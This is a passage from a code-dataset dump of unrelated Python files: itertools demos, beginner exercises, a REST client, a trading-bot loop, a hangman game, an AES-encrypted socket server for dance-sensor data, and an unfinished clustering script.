================================================================\n# CYCLE\nstates = ['ON', 'OFF']\n\ncc = itertools.cycle(states)\n\nfor _ in range(5):\n print(next(cc))\n\n# 
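================================================================\n# Note: cycle() caches the iterable and repeats it endlessly, so iteration\n# over it must always be bounded, as the range(5) loop above does.\n# 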
================================================================\n# REPEAT\nr_2 = itertools.repeat(2)\n\n# repeat(2) with no 'times' argument yields 2 forever, so bound the demo\nfor item in itertools.islice(r_2, 5):\n    print(item)\n\nr_2 = itertools.repeat(2, times=5)\n\n# Prints 2, 5 times\nfor item in r_2:\n    print(item)\n\n# Prints string 'hello' 10 times\nr_hello = itertools.repeat('hello', times=10)\nfor item in r_hello:\n    print(item)\n\n# ================================================================\n# COMBINATION\nletters = ['a', 'b', 'c']\nmy_comb = itertools.combinations(letters, 2)\n\nfor item in my_comb:\n    print(item)\n\nvowel_comb = itertools.combinations(\"aeiou\", 2)\n\nfor item in vowel_comb:\n    print(item)\n\n# ================================================================\n# PERMUTATION\nmy_permutation = itertools.permutations(letters)\n# The above code Prints\n# ('a', 'b', 'c')\n# ('a', 'c', 'b')\n# ('b', 'a', 'c')\n# ('b', 'c', 'a')\n# ('c', 'a', 'b')\n# ('c', 'b', 'a')\n\nmy_permutation = itertools.permutations(letters, 2)\n\n# The above code prints\n# ('a', 'b')\n# ('a', 'c')\n# ('b', 'a')\n# ('b', 'c')\n# ('c', 'a')\n# ('c', 'b')\n\nfor item in my_permutation:\n    print(item)\n\n# ================================================================\n# iSlice\n\nnames = ['apple', 'google', 'yahoo', 'flikpart', 'netflix', 'gmail']\n\nmy_slice = itertools.islice(names, 2, 5)\n\nfor item in my_slice:\n    print(item)\n\nfor item in itertools.islice(names, 2, None):\n    print(item)\n# None is used to indicate everything beyond index 2 (item[2:])\n\nfor item in itertools.islice(names, None, 3):\n    print(item)\n# start up to index 3 but not including index 3 (item[:3])\n\n# Reading first 5 lines of the file\nwith open('read.txt', 'r') as f:\n    lines = itertools.islice(f, 5, None)\n    for line in lines:\n        print(line, end='')\n# ================================================================\n\n# ================================================================\n# chain\na = [1, 2, 3]\nb = [4, 5, 6]\nc = [7, 8, 9]\n\n# Merges all 3 lists and returns an iterator object\nd = itertools.chain(a, b, c)\n\n\n# GroupBy\n# ================================================================\nportfolio = [\n    {'name': 'AA', 'shares': 100, 'date': '25/06/2010'},\n    {'name': 'FB', 'shares': 110, 'date': '23/09/2010'},\n    {'name': 'IBM', 'shares': 90, 'date': '26/07/2010'},\n    {'name': 'FB', 'shares': 240, 'date': '23/09/2010'},\n    {'name': 'FB', 'shares': 210, 'date': '26/06/2010'},\n    {'name': 'FB', 'shares': 109, 'date': '24/06/2010'},\n    {'name': 'IBM', 'shares': 80, 'date': '24/06/2010'},\n    {'name': 'AAPL', 'shares': 110, 'date': '25/06/2010'}\n]\n\n# Sort the list based on date\nportfolio.sort(key=lambda item: item['date'])\n# Groupby Date\nfor name, item in itertools.groupby(portfolio, key=lambda item: item['date']):\n    print(name)\n    for it in item:\n        print(it)\n\n# Sort the list based on Name\nportfolio.sort(key=lambda item: item['name'])\n# Groupby Shares Name\nfor name, item in itertools.groupby(portfolio, key=lambda item: item['name']):\n    print(name)\n    for it in item:\n        print(it)\n\n# zip_longest\n# =======================================================================\na = [1, 2, 3]\nb = [4, 5, 6, 7, 8]\n\nz = itertools.zip_longest(a, b)\n\nprint(list(z)) # Prints [(1, 4), (2, 5), (3, 6), (None, 7), (None, 8)]\n\nz = itertools.zip_longest(a, b, fillvalue=\"NA\")\nprint(list(z)) # Prints [(1, 4), (2, 5), (3, 6), ('NA', 7), ('NA', 8)]\n\n# takewhile\n# =======================================================================\nt = itertools.takewhile(lambda item: item in 
'aeiou', 'ear')\nprint(list(t)) # ['e', 'a']\n\n# Iterating through varying records\nprices = [\n ['GOOG', 490.1, 485.25, 487.5],\n ['IBM', 91.5],\n ['HPE', 13.75, 12.1, 13.25, 14.2, 13.5],\n ['GE', 52.5, 51.2]\n]\n\nfor name, *values in prices:\n print(name, values)\n","sub_path":"14_Misc_Topics/_itertools_module.py","file_name":"_itertools_module.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86214796","text":"\"\"\"\nPlayground to test the API.\n\"\"\"\n\nfrom emjay import Tracer, Settings\nfrom emjay.writers import LogWriter\n\nimport logging\n\nSettings.default_writer = LogWriter\n\ntracer = Tracer.create()\ntracer.writer.logger.setLevel(logging.DEBUG)\ntracer.writer.logger.addHandler(logging.StreamHandler())\n\n@tracer.trace_function\ndef bar():\n \"\"\"\n Bar\n \"\"\"\n tracer.trace_msg(\"Horray\")\n\n\n@tracer.trace_function\ndef foo(a, b):\n \"\"\"\n Foo\n \"\"\"\n tracer.trace_str(a=a)\n tracer.trace_str(b=b)\n tracer.trace_msg(\"%s %s\", a, b)\n bar()\n\nclass TestClass(object):\n\n @tracer.trace_method\n def foo(self):\n \"\"\"\n Test.foo\n \"\"\"\n tracer.trace_msg(\"Foo!\")\n\n\nfoo(\"Hello\", \"World\")\n\ntest = TestClass()\ntest.foo()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408852493","text":"#!/usr/bin/env python\n\nimport sys\nfrom make2scons.makefileparser import MakefileParser\nfrom make2scons.makefilereader import MakefileReader\n\n\ndef main():\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n print(\"make2scons \")\n exit(1)\n infile = sys.argv[1]\n outfile = sys.argv[2]\n reader = MakefileReader(infile)\n reader.read()\n\n parser = MakefileParser(reader.makefilestr, infile, outfile)\n parser.run()\n parser.write()\n print(\"Done\")\n\n\nmain()\n","sub_path":"make2scons/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102508174","text":"# Queue\n# cf. 
Stack #10828\n\nqueue = []\nfor _ in range(int(input())):\n    op = input().split() # operator, operand\n    if op[0] == 'push':\n        queue.append(op[1])\n    elif op[0] == 'pop':\n        try:\n            print(queue.pop(0))\n        except IndexError as e:\n            print(-1)\n    elif op[0] == 'size':\n        print(len(queue))\n    elif op[0] == 'empty':\n        if len(queue) == 0:\n            print(1)\n        else:\n            print(0)\n    elif op[0] == 'front':\n        if len(queue) != 0:\n            print(queue[0])\n        else:\n            print(-1)\n    elif op[0] == 'back':\n        if len(queue) != 0:\n            print(queue[-1])\n        else:\n            print(-1)\n","sub_path":"scripts/10845.py","file_name":"10845.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"452227931","text":"\"\"\"Argux REST client for Argux Server.\"\"\"\n\nimport json\nimport requests\n\nfrom requests.exceptions import (\n    ConnectionError,\n    HTTPError,\n)\n\nfrom argux_net_monitor.models.Host import Host\n\n\nclass RESTClient:\n\n    \"\"\"RESTClient.\n\n    Class used to interact with ArguxServer\n    \"\"\"\n\n    def __init__(self, base_url, username, secret):\n        \"\"\"Initialise RESTClient.\n\n        Arguments:\n        base_url: base-url of argux-server, eg:\n            https://argux-server:port/\n        \"\"\"\n        self.base_url = base_url\n        self.username = username\n        self.secret = secret\n        self.cookies = {}\n        self.headers = {\n            'Content-Type': 'application/json',\n            'Accept': 'application/json'\n        }\n\n    def __login(self):\n        payload = {\n            'username': self.username,\n            'password': self.secret\n        }\n        try:\n            response = requests.post(\n                self.base_url+'/rest/1.0/login',\n                headers=self.headers,\n                data=json.dumps(payload))\n\n            self.cookies['argux_server'] = response.cookies['argux_server']\n            self.headers['X-Csrf-token'] = response.headers['X-Csrf-token']\n        except ConnectionError as e:\n            print(e)\n\n\n    def get_hosts(self):\n\n        self.__login()\n\n        try:\n            response = requests.get(\n                self.base_url+'/rest/1.0/host',\n                cookies = self.cookies,\n                headers = self.headers)\n        except ConnectionError as e:\n            raise e\n        except HTTPError as e:\n            raise e\n\n        json_response = response.json()\n        if json_response is None:\n            raise ValueError('Invalid Response, could not decode JSON')\n        if 'hosts' not in json_response:\n            raise ValueError('Invalid Response, missing \\'hosts\\' attribute')\n\n        hosts = []\n\n        for json_host in json_response['hosts']:\n            if 'name' in json_host:\n                hosts.append(Host(name=json_host['name']))\n\n        return hosts\n","sub_path":"argux_net_monitor/rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"254734541","text":"# Use a while loop to print 1 3 5 7 9\n\n# The answer is as follows:\n\ndef print_odd(num): # the parameter is the count of odd numbers to print\n\tn = 1 # set the starting number\n\ts = 1 # set up a counter variable\n\twhile True:\n\t\tif s > num: # exit the loop and stop printing once enough numbers have been printed\n\t\t\tbreak\n\t\tprint(n) # print it\n\t\tn += 2 # increase the number by 2 each time\n\t\ts += 1 # increase the count by 1 each time\n\nprint_odd(5) # print five numbers\n\n\n\n\n\n# Write a function that checks whether the number 6 is in the list l; if it is, print \"found\", otherwise print \"not found\"\n\nl = [1,5,7,8,9]\n\n# The answer is as follows:\n\nl = [1,5,7,8,9]\n\ndef find_num(num): # define a function with one parameter, num\n\tif num in l: # check whether num is in l\n\t\tprint('found')\n\telse:\n\t\tprint('not found')\n\nfind_num(6) # pass in the argument 6\n\n\n\n\n\n# Split the string s into two strings s1 and s2, where s1 contains only the letters, converted to lower case and sorted [a-z], and s2 contains only the digits, sorted in ascending order\n\ns = \"aAsnr3id2d4b6gs7DZsf9e1AF\"\n\n# The answer is as follows\n\ns = \"aAsnr3id2d4b6gs7DZsf9e1AF\"\n\nl1 = []\nl2 = []\n\n# Build two lists: one containing only lower-case letters, the other only digits\ndef get_list():\n\tfor i in s.lower(): # convert all upper-case letters to lower case, then iterate over the string \n\t\ttry:\t\t\t# use an exception to decide: if it converts to a number it is a digit, otherwise it is a letter\n\t\t\tnum = 
int(i)\n\t\t\tl2.append(num) # put the digit into l2\n\t\texcept ValueError as e:\n\t\t\tl1.append(i) # put the letter into l1\n\n# Get the two sorted strings s1 and s2\ndef get_result():\n\ts1 = ''.join(sorted(l1)) # sort the letter list by ASCII value in ascending order and join it into the string s1\n\ts2 = ''.join(map(lambda n:str(n),sorted(l2))) # sort the digit list in ascending order, convert the elements to strings, and join them into s2\n\treturn (s1,s2) # return a tuple\n\ndef main():\n\tget_list()\n\tresult = get_result() # get the (s1,s2) return value of get_result()\n\ts1 = result[0]\n\ts2 = result[1]\n\tprint(\"s1:\",s1)\n\tprint(\"s2:\",s2)\n\nmain()\n","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"33366017","text":"# Definition for a binary tree node.\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n    def insert(self, x):\n        if self.val:\n            if x < self.val:\n                if self.left is None:\n                    self.left = TreeNode(x)\n                else: \n                    self.left.insert(x)\n            elif x > self.val:\n                if self.right is None:\n                    self.right = TreeNode(x)\n                else: \n                    self.right.insert(x)\n\n    def printTree(self):\n        if self.left:\n            self.left.printTree()\n        print(self.val)\n        if self.right:\n            self.right.printTree()\n    \nroot = TreeNode(12)\nroot.insert(6)\nroot.insert(14)\nroot.insert(3)\n\nroot.printTree()\n\n\n    \n","sub_path":"leetCode/100sameTree.py","file_name":"100sameTree.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"424095171","text":"import importlib\nimport os\n\nfrom ..utils.formatting import exception_to_str\n\n\ndef resolve_instance(arg, instance_type, default_path=\"\"):\n    if not (isinstance(arg, str) and arg.startswith(\"@\")):\n        return None\n\n    if arg.startswith(\"@/\"):\n        module_name = arg.replace(\"@/\", \"\")\n    else:\n        # if relative path @example insert default path\n        module_name = arg.replace(\"@\", os.path.join(default_path, \"\"), 1)\n\n    module_name = module_name.replace(\"/\", \".\")\n    module_name = module_name.rstrip(\".\")\n\n    try:\n        instance_type.set_latest(None)\n        module = importlib.import_module(module_name)\n        importlib.reload(module)\n\n        instance = instance_type.latest()\n        if isinstance(instance, instance_type):\n            instance._resolved_by_expression = arg\n            instance._resolved_module_name = module_name\n            return instance\n\n        raise ValueError(\n            f\"Could not find any {instance_type.__name__} in module {module_name}\"\n        )\n    except ImportError as e:\n        raise ImportError(\n            f\"Could not import module @{module_name} \"\n            f\"The following exception occurred: {exception_to_str(e)}. \"\n        )\n\n\ndef resolve_instance_from_code(code, instance_type):\n    try:\n        instance_type.set_latest(None)\n        exec(code)\n\n        instance = instance_type.latest()\n        if isinstance(instance, instance_type):\n            instance._resolved_by_code = code\n            return instance\n\n        raise ValueError(f\"Could not find any {instance_type.__name__} in code\")\n    except Exception as e:\n        raise ImportError(\n            f\"Could not evaluate code. The following exception occurred: {exception_to_str(e)}. 
\"\n )\n","sub_path":"src/machinable/utils/importing.py","file_name":"importing.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515637043","text":"import datetime as datetime\nimport time\nimport urllib2\n\nfrom botchart import BotChart\nfrom botstrategy import BotStrategy\nfrom botlog import BotLog\nfrom botcandlestick import BotCandlestick\n\n# Script for live trading\n\npair = \"BTC_XMR\"\nstartTime = time.time()\n\n\n# Calculate time difference and get preload data for EMA\npriceSetupDelta = datetime.timedelta(minutes=13*5) \npriceSetupTime = datetime.datetime.fromtimestamp(startTime) - priceSetupDelta\npriceSetupTime = time.mktime(priceSetupTime.timetuple())\n\npriceSetupChart = BotChart(pair, 300, priceSetupTime, startTime)\npriceSetupPrices = [point.close for point in priceSetupChart.getPoints()]\n\n# Same for trend data\ntrendSetupDelta = datetime.timedelta(minutes=13*30) \ntrendSetupTime = datetime.datetime.fromtimestamp(startTime) - trendSetupDelta\ntrendSetupTime = time.mktime(trendSetupTime.timetuple())\n\ntrendSetupChart = BotChart(pair, 1800, trendSetupTime, startTime)\ntrendSetupPrices = [point.close for point in trendSetupChart.getPoints()]\n\n\n# Load strategy with past prices for EMA\nstrategy = BotStrategy(priceSetupPrices, trendSetupPrices)\n\n\n# Load charts\nchart = BotChart(pair, 300)\ntrendChart = BotChart(pair, 1800)\n\n\ncandlesticks = []\ndevelopingCandlestick = BotCandlestick()\n\n\n# Trade loop\nwhile True:\n # Build candle\n try:\n developingCandlestick.tick(chart.getCurrentPrice())\n except urllib2.URLError:\n time.sleep(int(30))\n developingCandlestick.tick(chart.getCurrentPrice())\n\n # Look at strategy when candle is closed\n if (developingCandlestick.isClosed()):\n candlesticks.append(developingCandlestick)\n trendPrice = trendChart.getCurrentPrice()\n strategy.tick(developingCandlestick, trendPrice)\n developingCandlestick = BotCandlestick()\n\n time.sleep(int(30))\n","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"488399455","text":"import socket\nimport threading\nimport time\nimport base64\nfrom Cryptodome.Cipher import AES\nimport sys\nfrom Cryptodome import Random\nimport time as time2\nfrom statistics import mean\nimport os\nimport traceback\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(CURRENT_DIR))\n# from Test.runLivePrediction_ultra96 import classificationEngine\nfrom Test.relayMain import classificationEngine\n\n# Class to handle the connection to the laptop (acts as the server and opens the socket)\nclass Server(threading.Thread):\n def __init__(self, ip_addr, secret_key, ultra96, sync_threshold, buff_size, dancers_count):\n super(Server, self).__init__()\n\n self.ip_addr = ip_addr\n self.buff_size = buff_size\n self.dancers_count = dancers_count\n self.secret_key = secret_key\n self.ultra96 = ultra96\n self.logout = ultra96.logout\n self.dancers_ready = ultra96.dancers_ready\n self.sync_threshold = sync_threshold\n self.first_x_timestamp = {}\n self.dancer_data = {}\n self.classifier = classificationEngine(self.sendClassificationToDashboard)\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket_connection = []\n\n def sendClassificationToDashboard(self, position, 
predictedResult, syncDelay, formattedEVALSyncDelay):\n dashboard_msg = \"!M|{pos}|{prediction}|{syncdelay}\".format(pos = position, prediction=predictedResult, syncdelay = syncDelay)\n print(dashboard_msg)\n self.ultra96.dashboard_server.send_message(dashboard_msg)\n eval_msg = \"{pos}|{prediction}|{syncdelay}\".format(pos = position, prediction = predictedResult, syncdelay=formattedEVALSyncDelay)\n print(eval_msg)\n self.ultra96.eval_client.send_message(eval_msg)\n \n def stop(self):\n for conn in self.socket_connection:\n conn.close()\n self.socket.close()\n print(\"Ultra96 Server Has Closed\")\n\n def recvall(self, conn):\n # Buffer to ensure that only reading the full 256 bytes\n received_chunks = []\n remaining = self.buff_size\n while remaining > 0:\n received = conn.recv(remaining)\n if not received:\n return None\n received_chunks.append(received)\n remaining -= len(received)\n return b''.join(received_chunks)\n\n # Function to handle the messages from each socket, runs on a separate thread\n def handle_client(self, conn, addr):\n self.dancers_count -= 1\n dancer_id = -1\n dancer_name = \"\"\n network_delay = 0\n time = time2\n while True:\n data = self.recvall(conn)\n recv_time = time.time()\n # recv_time = 0\n if data:\n try:\n msg = self.decrypt_message(data)\n msg = msg.strip()\n # Calculate clock offset (Week 7 Evaluation)\n if \"!T\" in msg:\n self.clock_sync(conn, msg, dancer_id, recv_time)\n \n elif \"!S\" in msg:\n # Start message\n split_message = msg.split(\"|\")\n dancer_id = int(split_message[1])\n dancer_name = str(split_message[2])\n time.sleep(0.02 * int(dancer_id))\n self.ultra96.dashboard_server.send_message(msg)\n self.create_dancer(dancer_id, dancer_name)\n print(\n # f\"Dancer {dancer_id} {dancer_name} connected.\")\n f\"Server received start packet from dancer {dancer_id}.\") \n \n # Dancers sensor data\n elif \"!D\" in msg:\n # Data message\n dashboard_message = msg + f\"{dancer_name}|\"\n self.ultra96.dashboard_server.send_message(\n dashboard_message)\n tokens = msg.split(\"|\")\n [dev, ax, ay, az, gx, gy, gz, ts] = list(map(float, tokens[1:9]))\n self.classifier.add_data(\"DATA\", [dev, ax, ay, az, gx, gy, gz])\n \n # Calculate network delay (Week 7 Evaluation)\n elif \"O\" in msg:\n network_delay = float(msg.split(\"|\")[1])\n print(network_delay)\n \n # EMG Data\n elif \"!E\" in msg:\n dashboard_message = msg\n self.ultra96.dashboard_server.send_message(\n dashboard_message)\n tokens = msg.split(\"|\")\n [dev, gx, gy, gz, ts] = list(map(float, tokens[1:6]))\n self.classifier.add_data(\"EMG\", [ gx, gy, gz])\n \n except Exception as e:\n traceback.print_exc()\n print(e)\n else:\n # print(f\"Calculated sync delay is: {self.sync_delay}\")\n print(f\"No more data received from {dancer_id}\")\n break\n print(\n f\"Dancer {dancer_id} has disconnected\")\n\n def start_clock_sync_all(self):\n for conn in self.socket_connection:\n self.send_message(conn, \"!T|\")\n\n # Replies the clock synchronisation protocol\n def clock_sync(self, conn, msg, dancer_id, recv_time):\n msg += f\"{recv_time}|\"\n send_time = time.time()\n msg += f\"{send_time}|\"\n self.send_message(conn, msg, dancer_id=dancer_id)\n\n def create_dancer(self, dancer_id, dancer_name):\n self.dancer_data[dancer_id - 1] = []\n # self.dancer_names[dancer_id - 1] = dancer_name\n self.first_x_timestamp[dancer_id - 1] = []\n\n def add_data(self, dancer_id, data):\n if len(self.first_x_timestamp[dancer_id - 1]) < 7:\n data[8] = float(data[8])\n self.first_x_timestamp[dancer_id - 1].append(data[8])\n 
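# Each dancer contributes its first 7 packet timestamps; once all three\n            # dancers have 7, get_sync_delay() below compares their mean start times.\n            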
print(f\"{len(self.first_x_timestamp[dancer_id - 1])} timestamp(s) of dancer \" \n + f\"{dancer_id}\" + \" collected.\")\n \n if (len(self.first_x_timestamp[0]) == 7) and (len(self.first_x_timestamp[1]) == 7) and (len(self.first_x_timestamp[2]) == 7):\n self.get_sync_delay()\n self.first_x_timestamp[dancer_id - 1] = []\n \n # else:\n # self.first_x_timestamp[dancer_id - 1] = []\n \n # Calculate Sync Delay (for Week 7 evaluation)\n def get_sync_delay(self):\n start_of_each_dancer = [mean(timestamps)\n for timestamps in self.first_x_timestamp.values()]\n earliest_dancer = min(start_of_each_dancer)\n latest_dancer = max(start_of_each_dancer)\n self.sync_delay = int((latest_dancer - earliest_dancer) * 1000)\n print(f\"Calculated sync delay is: {self.sync_delay}\")\n\n def run(self):\n self.socket.bind(self.ip_addr)\n self.socket.listen()\n self.socket.settimeout(5)\n print(\n f\"Waiting for {self.dancers_count} connection(s)\")\n while self.dancers_count > 0:\n try:\n conn, addr = self.socket.accept()\n thread = threading.Thread(\n target=self.handle_client, args=(conn, addr))\n self.socket_connection.append(conn)\n thread.start()\n except socket.timeout:\n pass\n except OSError:\n pass\n print(f\"{len(self.socket_connection)} dancers connected.\")\n self.dancers_ready.set()\n\n # Sends a start message to all dancers\n def start_evaluation(self):\n # Start command\n for idx, conn in enumerate(self.socket_connection):\n self.send_message(conn, \"!S\")\n conn_idx = idx + 1\n print(f\"Server sends start packet to connection {conn_idx}\")\n for dancer in self.first_x_timestamp.keys():\n self.first_x_timestamp[dancer] = []\n\n def send_message(self, conn, msg, dancer_id=\"ALL\"):\n encrypted_message = self.encrypt_message(msg)\n try:\n conn.sendall(encrypted_message)\n except:\n pass\n\n def decrypt_message(self, cipher_text):\n decoded_message = base64.b64decode(cipher_text)\n iv = decoded_message[:16]\n secret_key = bytes(str(self.secret_key), encoding=\"utf8\")\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n decrypted_message = cipher.decrypt(decoded_message[16:]).strip()\n return decrypted_message.decode('utf8')\n\n def encrypt_message(self, plain_text):\n plain_text = plain_text.ljust((int(len(plain_text)/AES.block_size) + 1) * AES.block_size,\" \")\n secret_key = bytes(str(self.secret_key), encoding=\"utf8\")\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n msg = plain_text.encode(\"utf8\")\n encoded = base64.b64encode(iv + cipher.encrypt(msg))\n # pad to buffer size\n encrypted_msg = encoded.ljust(self.buff_size, b' ')\n return encrypted_msg\n\nclass Logout():\n def __init__(self):\n self.logout = \"test\"\n\ndef main():\n ULTRA_SERVER_ADDR = ('localhost', 8081)\n NUM_OF_DANCERS = 1\n SYNC_THRESHOLD = 0.2\n # NO_OF_TIMESTAMP = 5\n BUFF_SIZE = 256\n SECRET_KEY = 9999999999999999\n logout = Logout()\n\n server = Server(ULTRA_SERVER_ADDR, SECRET_KEY, logout, SYNC_THRESHOLD, BUFF_SIZE, NUM_OF_DANCERS)\n server.run()\n server.start_evaluation()\n\nif __name__ == '__main__':\n main()","sub_path":"external_comms/ultra96_server.py","file_name":"ultra96_server.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134057161","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# 规范化函数,规范化随机生成的矩阵\n\n\ndef normalize(vec):\n\n s = sum(vec)\n assert(abs(s) != 0.0) # 和不能为0\n\n for i, item in enumerate(vec):\n assert(item >= 0) # 所有概率不能为负\n vec[i] = item * 1.0 / 
s\n","sub_path":"Algorithm/pLSA/my_util.py","file_name":"my_util.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"653944253","text":"def DigitHangman():\n question = input(\"Enter the question : \")\n puzzle = question.split()\n answer_list = []\n guess_time = 0\n WrongGuess = ''\n if len(puzzle) != 12:\n print('Question must has 12 numbers')\n return False\n for i in puzzle:\n if int(i) > 9 or int(i) < 0:\n print('Number must be 0-9')\n break\n for i in range(len(puzzle)):\n answer_list.append(\"-\")\n while guess_time < 5:\n answer = ''\n for i in answer_list:\n answer = answer + i + ' '\n print(answer,WrongGuess)\n guess = input(\"Guess : \")\n for i in range(len(puzzle)):\n if puzzle[i] == guess:\n answer_list[i] = guess\n elif guess not in puzzle:\n WrongGuess += (guess+' ')\n break\n guess_time += 1\n print(answer,WrongGuess)\n print(12-answer_list.count('-'))\nDigitHangman()\n","sub_path":"TheInternship2020/DigitHangman.py","file_name":"DigitHangman.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"377293619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 15:54:53 2019\n\n@author: UO250708\n\"\"\"\n\nfrom PIL import Image # funciones para cargar y manipular imágenes\nimport numpy as np \nimport matplotlib.pyplot as plt \n\nwhite = np.ones(shape = (250,250))\nblack = np.zeros(shape = (250,250))\n\ntile1 = np.tile(np.concatenate((white, black), axis=1),4)\ntile2 = np.tile(np.concatenate((black, white), axis=1),4)\n\ntile = np.concatenate((tile1, tile2), axis=0)\n\nfor i in range(6):\n if(i%2==0):\n tile = np.concatenate((tile, tile1), axis=0)\n else:\n tile = np.concatenate((tile, tile2), axis=0)\n\nplt.imshow(tile, cmap=\"gray\")\nplt.show()\n\na2 = (tile-np.min(tile))/(np.max(tile)-np.min(tile))*255 \na3 = a2.astype(np.uint8)\n\nIm = Image.fromarray(a3)\nIm.save(\"resources/ajedrez.jpg\")\n\nwhite = np.zeros(shape = (500,500))\ncentro = 250\nradio = 250\nflag=True\nwhile radio>5:\n if(flag):\n for i in range(white.shape[0]):\n for j in range(white.shape[1]):\n if((i-centro)**2+(j-centro)**2 1:\n i=0\n for item in self.coordonate:\n if i==0:\n string_punct += str(item)\n i=1\n else:\n string_punct += \";\" + str(item)\n else:\n string_punct = str(self.coordonate[0])\n return string_punct\n\nclass Cluster:\n clusterX = -1\n clusterY = -1\n clusterLungime = -1\n def __init__(self, item1, item2):\n self.element1 = item1\n self.element2 = item2\n self.inaltime = calculeaza_media_distantelor(self)\n\n\ndef get_puncte_din_cluster(cluster):\n global lista_puncte_din_ultimul_cluster\n item1 = cluster.element1\n item2 = cluster.element2\n if isinstance(item1, Cluster):\n get_puncte_din_cluster(item1)\n elif isinstance(item1, Punct):\n lista_puncte_din_ultimul_cluster.append(item1)\n if isinstance(item2, Cluster):\n get_puncte_din_cluster(item2)\n elif isinstance(item2, Punct):\n lista_puncte_din_ultimul_cluster.append(item2)\n\ndef pune_puncte_in_cluster(cluster, cluster_rezultat):\n item1 = cluster.element1\n item2 = cluster.element2\n if isinstance(item1, Cluster):\n pune_puncte_in_cluster(item1, cluster_rezultat)\n elif isinstance(item1, Punct):\n cluster_rezultat.append(item1)\n if isinstance(item2, Cluster):\n pune_puncte_in_cluster(item2, cluster_rezultat)\n elif isinstance(item2, Punct):\n cluster_rezultat.append(item2)\n\ndef calculeaza_media_distantelor(cluster):\n global 
lista_puncte_din_ultimul_cluster\n get_puncte_din_cluster(cluster)\n contor = 0\n suma_distante = 0\n for i in range(0, len(lista_puncte_din_ultimul_cluster)):\n for j in range(0, len(lista_puncte_din_ultimul_cluster)):\n if i > j:\n distanta = calculeaza_distanta(lista_puncte_din_ultimul_cluster[i], lista_puncte_din_ultimul_cluster[j])\n suma_distante += distanta\n contor += 1\n lista_puncte_din_ultimul_cluster.clear()\n return suma_distante/contor\n\ndef bytes_to_string(bytes_content):\n string_content = bytes_content.decode(\"utf-8\")\n return string_content\n\ndef check_if_points(punct1, punct2):\n if isinstance(punct1, Punct) and isinstance(punct2, Punct):\n return True\n return False\n\ndef calculeaza_distanta(item1, item2):\n distanta_minima = float(\"inf\")\n distanta_maxima = -float(\"inf\")\n suma_distantelor = 0\n contor_distante = 0\n lista_puncte_din_ultimul_cluster_a = list()\n lista_puncte_din_ultimul_cluster_b = list()\n if isinstance(item1, Punct):\n lista_puncte_din_ultimul_cluster_a.append(item1)\n elif isinstance(item1, Cluster):\n pune_puncte_in_cluster(item1, lista_puncte_din_ultimul_cluster_a)\n\n if isinstance(item2, Punct):\n lista_puncte_din_ultimul_cluster_b.append(item2)\n elif isinstance(item2, Cluster):\n pune_puncte_in_cluster(item2, lista_puncte_din_ultimul_cluster_b)\n\n for i in range(0, len(lista_puncte_din_ultimul_cluster_a)):\n for j in range(0, len(lista_puncte_din_ultimul_cluster_b)):\n suma_distante = 0\n for k in range(0, d):\n suma_distante += math.pow((float(lista_puncte_din_ultimul_cluster_a[i].coordonate[k]) - float(lista_puncte_din_ultimul_cluster_b[j].coordonate[k])), 2)\n suma_distante = float(\"{0:.2f}\".format(suma_distante))\n distanta_curenta = math.sqrt(suma_distante)\n suma_distantelor += distanta_curenta\n contor_distante += 1\n if distanta_curenta < distanta_minima:\n distanta_minima = distanta_curenta\n if distanta_curenta > distanta_maxima:\n distanta_maxima = distanta_curenta\n\n distanta_medie = suma_distantelor / contor_distante\n if tip_similaritate == \"single-linkage\":\n return distanta_minima\n elif tip_similaritate == \"complete-linkage\":\n return distanta_maxima\n elif tip_similaritate == \"average-linkage\":\n return distanta_medie\n\ndef afiseaza_matrice_distante(matrice_distante):\n for i in range(0, len(lista_puncte)):\n for j in range(0, len(lista_puncte)):\n print(matrice_distante[i,j], end=\" ; \")\n print(\"\")\n\ndef get_pozitie_punct(punct_distanta):\n for i in range(0, len(lista_puncte)):\n if lista_puncte[i].coordonate == punct_distanta.coordonate:\n return i\n return -1000\n\ndef get_distante_minime(matrice, lista_elemente_din_matrice):\n distanta_minima = float(\"inf\")\n pozitii_distante_minime = list()\n distanta_min = float(\"inf\")\n min_litera_pozitie = 